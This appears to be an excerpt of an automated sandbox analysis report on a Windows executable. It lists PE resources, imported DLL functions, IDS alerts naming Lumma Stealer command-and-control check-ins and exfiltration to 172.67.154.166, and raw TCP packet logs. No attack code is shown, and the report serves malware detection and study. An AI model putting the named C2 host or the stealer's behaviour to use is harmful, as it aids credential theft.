                                                                                      RT_DIALOG0x6bed840x198dataEnglishUnited States0.5
                                                                                      RT_DIALOG0x6bef1c0xa4dataEnglishUnited States0.7012195121951219
                                                                                      RT_DIALOG0x6befc00x294dataEnglishUnited States0.44393939393939397
                                                                                      RT_DIALOG0x6bf2540x1e0dataEnglishUnited States0.5270833333333333
                                                                                      RT_DIALOG0x6bf4340x418dataEnglishUnited States0.32633587786259544
                                                                                      RT_DIALOG0x6bf84c0x25cdataEnglishUnited States0.4602649006622517
                                                                                      RT_DIALOG0x6bfaa80x34adataEnglishUnited States0.4014251781472684
                                                                                      RT_DIALOG0x6bfdf40x11edataEnglishUnited States0.534965034965035
                                                                                      RT_DIALOG0x6bff140x1eadataEnglishUnited States0.46122448979591835
                                                                                      RT_DIALOG0x6c01000x13cdataEnglishUnited States0.5949367088607594
                                                                                      RT_DIALOG0x6c023c0x1a4dataEnglishUnited States0.5380952380952381
                                                                                      RT_DIALOG0x6c03e00xe6dataEnglishUnited States0.6347826086956522
                                                                                      RT_DIALOG0x6c04c80x390dataEnglishUnited States0.4418859649122807
                                                                                      RT_DIALOG0x6c08580x21cdataEnglishUnited States0.5037037037037037
                                                                                      RT_DIALOG0x6c0a740x390dataEnglishUnited States0.4692982456140351
                                                                                      RT_DIALOG0x6c0e040x1dcdataEnglishUnited States0.5441176470588235
                                                                                      RT_DIALOG0x6c0fe00x346dataEnglishUnited States0.4701670644391408
                                                                                      RT_DIALOG0x6c13280x334dataEnglishUnited States0.43658536585365854
                                                                                      RT_DIALOG0x6c165c0x58dataEnglishUnited States0.8068181818181818
                                                                                      RT_DIALOG0x6c16b40x23cdataEnglishUnited States0.5122377622377622
                                                                                      RT_DIALOG0x6c18f00x1c2dataEnglishUnited States0.5066666666666667
                                                                                      RT_DIALOG0x6c1ab40x160dataEnglishUnited States0.5994318181818182
                                                                                      RT_DIALOG0x6c1c140xb2dataEnglishUnited States0.7191011235955056
                                                                                      RT_DIALOG0x6c1cc80x3d4dataEnglishUnited States0.3408163265306122
                                                                                      RT_DIALOG0x6c209c0x19edataEnglishUnited States0.6280193236714976
                                                                                      RT_DIALOG0x6c223c0x1a2dataEnglishUnited States0.5741626794258373
                                                                                      RT_DIALOG0x6c23e00x34dataEnglishUnited States0.8076923076923077
                                                                                      RT_DIALOG0x6c24140x2a8dataEnglishUnited States0.5338235294117647
                                                                                      RT_DIALOG0x6c26bc0x382dataEnglishUnited States0.48552338530066813
                                                                                      RT_DIALOG0x6c2a400xe8dataEnglishUnited States0.6336206896551724
                                                                                      RT_DIALOG0x6c2b280x34dataEnglishUnited States0.9038461538461539
                                                                                      RT_STRING0x6c2b5c0x4adataEnglishUnited States0.6891891891891891
                                                                                      RT_STRING0x6c2ba80x32cdataEnglishUnited States0.4125615763546798
                                                                                      RT_STRING0x6c2ed40x246dataEnglishUnited States0.5085910652920962
                                                                                      RT_STRING0x6c311c0x84dataEnglishUnited States0.5833333333333334
                                                                                      RT_STRING0x6c31a00x2a4dataEnglishUnited States0.3609467455621302
                                                                                      RT_STRING0x6c34440x20cdataEnglishUnited States0.3148854961832061
                                                                                      RT_STRING0x6c36500x24cdataEnglishUnited States0.4370748299319728
                                                                                      RT_STRING0x6c389c0x3cdataEnglishUnited States0.65
                                                                                      RT_STRING0x6c38d80x16edataEnglishUnited States0.39344262295081966
                                                                                      RT_STRING0x6c3a480xa6Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishUnited States0.7228915662650602
                                                                                      RT_STRING0x6c3af00x184dataEnglishUnited States0.4742268041237113
                                                                                      RT_STRING0x6c3c740x66dataEnglishUnited States0.696078431372549
                                                                                      RT_STRING0x6c3cdc0x1d6Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0EnglishUnited States0.35319148936170214
                                                                                      RT_STRING0x6c3eb40x186dataEnglishUnited States0.5384615384615384
                                                                                      RT_STRING0x6c403c0xb2dataEnglishUnited States0.6179775280898876
                                                                                      RT_STRING0x6c40f00x18cdataEnglishUnited States0.398989898989899
                                                                                      RT_STRING0x6c427c0x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                      RT_STRING0x6c43000x2adataEnglishUnited States0.5476190476190477
                                                                                      RT_STRING0x6c432c0x184dataEnglishUnited States0.48711340206185566
                                                                                      RT_STRING0x6c44b00x4e6dataEnglishUnited States0.37719298245614036
                                                                                      RT_STRING0x6c49980x264dataEnglishUnited States0.3333333333333333
                                                                                      RT_STRING0x6c4bfc0x2dadataEnglishUnited States0.3698630136986301
                                                                                      RT_STRING0x6c4ed80x8adataEnglishUnited States0.6594202898550725
                                                                                      RT_STRING0x6c4f640xacdataEnglishUnited States0.45348837209302323
                                                                                      RT_STRING0x6c50100xdedataEnglishUnited States0.536036036036036
                                                                                      RT_STRING0x6c50f00x4a8dataEnglishUnited States0.3221476510067114
                                                                                      RT_STRING0x6c55980x228dataEnglishUnited States0.4003623188405797
                                                                                      RT_STRING0x6c57c00x2cdataEnglishUnited States0.5227272727272727
                                                                                      RT_STRING0x6c57ec0x53cdataEnglishUnited States0.2947761194029851
                                                                                      RT_ACCELERATOR0x6c5d280x50dataEnglishUnited States0.7875
                                                                                      RT_GROUP_CURSOR0x6c5d780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5d8c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5da00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5db40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5dc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ddc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5df00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                      RT_GROUP_CURSOR0x6c5e400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e680x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                      RT_GROUP_CURSOR0x6c5e8c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ea00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5eb40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ec80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5edc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ef00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f7c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_ICON0x6c5fa40x5adataEnglishUnited States0.7666666666666667
                                                                                      RT_GROUP_ICON0x6c60000x22dataEnglishUnited States1.0588235294117647
                                                                                      RT_GROUP_ICON0x6c60240x22dataEnglishUnited States1.0588235294117647
                                                                                      RT_GROUP_ICON0x6c60480x30dataEnglishUnited States0.9375
                                                                                      RT_GROUP_ICON0x6c60780x22dataEnglishUnited States1.1176470588235294
                                                                                      RT_VERSION0x6c609c0x344dataEnglishUnited States0.45454545454545453
                                                                                      RT_MANIFEST0x6c63e00x357ASCII text, with very long lines (855), with no line terminatorsEnglishUnited States0.45146198830409356
                                                                                      None0x6c67380x17bdataEnglishUnited States0.39313984168865435
                                                                                      None0x6c68b40x590dataEnglishUnited States0.16362359550561797
                                                                                      None0x6c6e440x46ddataEnglishUnited States0.14386584289496912
                                                                                      None0x6c72b40x5e6dataEnglishUnited States0.1119205298013245
                                                                                      None0x6c789c0x2f4dataEnglishUnited States0.20634920634920634
                                                                                      None0x6c7b900x1cdataEnglishUnited States1.2857142857142858
                                                                                      None0x6c7bac0x18dataEnglishUnited States1.2916666666666667
                                                                                      DLLImport
                                                                                      SHELL32.dllSHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHAppBarMessage, SHGetFileInfoW, SHGetFolderPathW, DragAcceptFiles, SHOpenFolderAndSelectItems, CommandLineToArgvW, ShellExecuteW, DragFinish, DragQueryFileW
                                                                                      KERNEL32.dllGetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, SetEnvironmentVariableA, LCMapStringW, GetConsoleMode, GetStringTypeW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, IsDebuggerPresent, UnhandledExceptionFilter, TerminateProcess, GetTimeZoneInformation, IsProcessorFeaturePresent, QueryPerformanceCounter, HeapCreate, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, SetUnhandledExceptionFilter, GetFileType, SetStdHandle, VirtualQuery, GetSystemInfo, VirtualAlloc, InterlockedCompareExchange, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, ExitProcess, RaiseException, RtlUnwind, HeapReAlloc, HeapAlloc, CreateThread, ExitThread, DecodePointer, EncodePointer, HeapFree, GetStartupInfoW, HeapSetInformation, GetCommandLineW, FindResourceExW, GetUserDefaultLCID, SetErrorMode, VirtualProtect, SearchPathW, GetProfileIntW, GetNumberFormatW, GetWindowsDirectoryW, GetTempPathW, GetTempFileNameW, Sleep, GetFullPathNameW, GetVolumeInformationW, FindFirstFileW, FindClose, DuplicateHandle, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, lstrcmpiW, GetFileSize, GetSystemDirectoryW, InterlockedIncrement, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, GetThreadLocale, GlobalGetAtomNameW, GlobalFlags, SetThreadPriority, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetCurrentThread, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, LoadLibraryExW, InterlockedExchange, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, lstrcpyW, lstrlenA, lstrcmpA, GetCurrentProcessId, FreeResource, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, CompareStringW, InitializeCriticalSectionAndSpinCount, ActivateActCtx, DeactivateActCtx, lstrcmpW, CopyFileW, GlobalSize, lstrlenW, SetLastError, MultiByteToWideChar, ResumeThread, DeleteFileW, LocalLock, GetProcAddress, GetFileSizeEx, ReadFile, GetVersionExW, FormatMessageW, TerminateThread, WriteFile, GetTickCount, WaitForSingleObject, GetCurrentProcess, SetFilePointer, GlobalFree, GlobalUnlock, WideCharToMultiByte, GlobalAlloc, GlobalLock, FileTimeToLocalFileTime, CloseHandle, GetFileAttributesExW, GetFileTime, GetCurrentDirectoryW, CreateFileW, FileTimeToSystemTime, GetTimeFormatW, LocalFree, GetCurrentThreadId, GetLocalTime, GetLocaleInfoW, FreeLibrary, GetDateFormatW, DeleteCriticalSection, EnterCriticalSection, GetLastError, GetModuleFileNameW, GetFileAttributesW, LeaveCriticalSection, LoadLibraryW, InitializeCriticalSection, GetModuleHandleW, TryEnterCriticalSection, LockResource, MulDiv, SizeofResource, LoadResource, FindResourceW, GetConsoleCP
                                                                                      USER32.dllCreateMenu, MapVirtualKeyExW, IsCharLowerW, SubtractRect, CharUpperBuffW, RegisterClipboardFormatW, HideCaret, InvertRect, CreateAcceleratorTableW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, InvalidateRgn, CopyAcceleratorTableW, CharNextW, GetUpdateRect, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcW, DefFrameProcW, IsClipboardFormatAvailable, GetDoubleClickTime, UnregisterClassW, WaitMessage, PostThreadMessageW, DestroyAcceleratorTable, UnpackDDElParam, ReuseDDElParam, InsertMenuItemW, SetClassLongW, SetCursorPos, SetParent, CopyIcon, GetMenuDefaultItem, SetMenuDefaultItem, IsMenu, MonitorFromPoint, UpdateLayeredWindow, UnionRect, CharUpperW, NotifyWinEvent, MessageBeep, WindowFromPoint, DeleteMenu, SetLayeredWindowAttributes, EnumDisplayMonitors, RealChildWindowFromPoint, SystemParametersInfoW, DestroyMenu, GetMessageW, TranslateMessage, SetWindowContextHelpId, MapDialogRect, SetRect, IsZoomed, ShowOwnedPopups, PostQuitMessage, GetSysColorBrush, SetWindowRgn, DrawFrameControl, DrawEdge, GetMenuItemInfoW, LoadCursorW, EnableScrollBar, BringWindowToTop, CreatePopupMenu, FrameRect, IntersectRect, SetCursor, LoadImageW, GetIconInfo, CopyImage, DrawIconEx, DestroyIcon, GetNextDlgGroupItem, SetCapture, KillTimer, SetTimer, DrawFocusRect, OffsetRect, SetRectEmpty, IsRectEmpty, DestroyCursor, MapVirtualKeyW, GetKeyNameTextW, GetDesktopWindow, GetActiveWindow, CreateDialogIndirectParamW, GetNextDlgTabItem, EndDialog, InvalidateRect, DrawStateW, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringW, DrawTextExW, DrawTextW, TabbedTextOutW, FillRect, GetWindowThreadProcessId, IsWindowEnabled, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, CheckDlgButton, RegisterWindowMessageW, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, SetWindowsHookExW, CallNextHookEx, GetClassLongW, GetClassNameW, SetPropW, GetPropW, RemovePropW, SetFocus, EnableWindow, ReleaseCapture, GetCapture, SendMessageW, IsWindow, GetWindowTextLengthW, GetWindowTextW, GetForegroundWindow, GetLastActivePopup, SetActiveWindow, DispatchMessageW, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageW, MonitorFromWindow, GetMonitorInfoW, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, ValidateRect, PostMessageW, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, AdjustWindowRectEx, GetWindowRgn, GetAsyncKeyState, GetSysColor, RedrawWindow, ReleaseDC, GetDC, LoadStringW, GetCursorPos, ScreenToClient, LoadIconW, GetClientRect, GetWindowRect, LoadAcceleratorsW, TranslateAcceleratorW, SetClipboardData, OpenClipboard, EmptyClipboard, InflateRect, CloseClipboard, UpdateWindow, GetSystemMetrics, MessageBoxW, AppendMenuW, LoadMenuW, ModifyMenuW, DrawIcon, GetSubMenu, IsIconic, GetSystemMenu, CheckMenuItem, EnableMenuItem, GetMenuState, GetParent, GetFocus, LoadBitmapW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, RemoveMenu, GetMenuItemCount, InsertMenuW, GetMenuItemID, GetMenuStringW, GetWindow, PtInRect, CopyRect, SetWindowPos, SetWindowLongW, GetWindowLongW, GetMenu, CallWindowProcW, DefWindowProcW, GetDlgCtrlID, GetWindowPlacement, SetWindowPlacement, SetScrollInfo, GetScrollInfo, DeferWindowPos, EqualRect, LockWindowUpdate
                                                                                      GDI32.dllSetPixel, SetDIBColorTable, RealizePalette, StretchBlt, OffsetRgn, GetRgnBox, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, EnumFontFamiliesExW, ExtFloodFill, SetPaletteEntries, GetWindowOrgEx, PtInRegion, FillRgn, FrameRgn, DPtoLP, GetViewportOrgEx, LPtoDP, SetPixelV, GetTextFaceW, SelectPalette, GetStockObject, SetRectRgn, GetMapMode, GetTextCharsetInfo, EnumFontFamiliesW, CreateDIBitmap, RoundRect, Rectangle, CreateDIBSection, CreateRoundRectRgn, CreateCompatibleBitmap, Polygon, Ellipse, Polyline, GetTextColor, GetBkColor, CombineRgn, CreatePolygonRgn, CreateEllipticRgn, GetTextMetricsW, GetTextExtentPoint32W, PatBlt, CreateRectRgnIndirect, CreateHatchBrush, CreatePen, RestoreDC, SaveDC, SetBkColor, SetTextColor, CreateSolidBrush, GetObjectW, GetDeviceCaps, CreateFontIndirectW, CreateBitmap, CopyMetaFileW, GetBoundsRect, CreateDCW, CreateCompatibleDC, CreatePatternBrush, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, CreateRectRgn, SelectClipRgn, DeleteObject, SetLayout, GetLayout, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetROP2, SetPolyFillMode, SetBkMode, GetObjectType
                                                                                      MSIMG32.dllTransparentBlt, AlphaBlend
                                                                                      COMDLG32.dllGetFileTitleW
                                                                                      WINSPOOL.DRVDocumentPropertiesW, ClosePrinter, OpenPrinterW
                                                                                      ADVAPI32.dllCryptHashData, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, RegSetValueExW, CryptAcquireContextW, CryptDeriveKey, CryptGetKeyParam, CryptReleaseContext, RegQueryInfoKeyW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteValueW, RegCreateKeyExW, CryptDestroyHash, CryptDecrypt, RegEnumKeyExW, CryptDestroyKey, CryptCreateHash, CryptEncrypt, RegDeleteKeyW
                                                                                      COMCTL32.dllInitCommonControlsEx, ImageList_GetIconSize
                                                                                      SHLWAPI.dllPathStripToRootW, PathRemoveFileSpecW, PathFindFileNameW, PathRemoveExtensionW, PathFindExtensionW, PathIsUNCW
                                                                                      ole32.dllCoFreeUnusedLibraries, OleUninitialize, OleLockRunning, OleGetClipboard, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, OleInitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoInitializeEx, CLSIDFromString, CLSIDFromProgID, CoCreateGuid, OleDuplicateData, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, CoRegisterMessageFilter, CoRevokeClassObject, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal
                                                                                      OLEAUT32.dllVariantClear, VariantChangeType, VariantInit, SysAllocString, VariantCopy, SysAllocStringLen, SafeArrayDestroy, VariantTimeToSystemTime, SystemTimeToVariantTime, SysStringLen, VarBstrFromDate, OleCreateFontIndirect, SysFreeString
                                                                                      oledlg.dllOleUIBusyW
                                                                                      gdiplus.dllGdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipCloneImage, GdipDrawImageI, GdipGetImageGraphicsContext, GdiplusShutdown, GdiplusStartup, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageRectI
                                                                                      OLEACC.dllAccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
                                                                                      IMM32.dllImmReleaseContext, ImmGetContext, ImmGetOpenStatus
                                                                                      WINMM.dllPlaySoundW
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-23T02:29:11.940959+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.154.166443TCP
                                                                                      2024-12-23T02:29:12.685320+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549707172.67.154.166443TCP
                                                                                      2024-12-23T02:29:12.685320+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707172.67.154.166443TCP
                                                                                      2024-12-23T02:29:13.994762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.154.166443TCP
                                                                                      2024-12-23T02:29:14.749911+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549708172.67.154.166443TCP
                                                                                      2024-12-23T02:29:14.749911+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549708172.67.154.166443TCP
                                                                                      2024-12-23T02:29:16.322446+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.154.166443TCP
                                                                                      2024-12-23T02:29:18.572983+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.154.166443TCP
                                                                                      2024-12-23T02:29:21.593774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716172.67.154.166443TCP
                                                                                      2024-12-23T02:29:24.823919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549723172.67.154.166443TCP
                                                                                      2024-12-23T02:29:25.618042+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549723172.67.154.166443TCP
                                                                                      2024-12-23T02:29:27.744190+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549733172.67.154.166443TCP
                                                                                      2024-12-23T02:29:30.348810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549740172.67.154.166443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 23, 2024 02:29:10.712919950 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:10.712989092 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:10.713213921 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:10.714232922 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:10.714257002 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:11.940819979 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:11.940958977 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:11.947686911 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:11.947721004 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:11.948178053 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:11.989242077 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.015041113 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.015079021 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.015177011 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:12.685309887 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:12.685408115 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:12.685487032 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.687428951 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.687467098 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:12.687493086 CET49707443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.687506914 CET44349707172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:12.780591965 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.780703068 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:12.780822992 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.782088995 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:12.782124996 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:13.994627953 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:13.994761944 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:13.996308088 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:13.996342897 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:13.996678114 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:13.998481035 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:13.998522043 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:13.998575926 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.749876022 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.749957085 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.749995947 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.750025034 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.750061989 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.750114918 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.750148058 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.758613110 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.758677959 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.758701086 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.767030001 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.767123938 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.767138958 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.817385912 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.817406893 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.864247084 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.869281054 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.911153078 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.941448927 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.945333958 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.945369959 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.945431948 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.945472002 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.945494890 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.945534945 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.945561886 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.945764065 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.945805073 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:14.945837975 CET49708443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:14.945852995 CET44349708172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:15.107549906 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:15.107587099 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:15.107666016 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:15.108020067 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:15.108036041 CET44349709172.67.154.166192.168.2.5
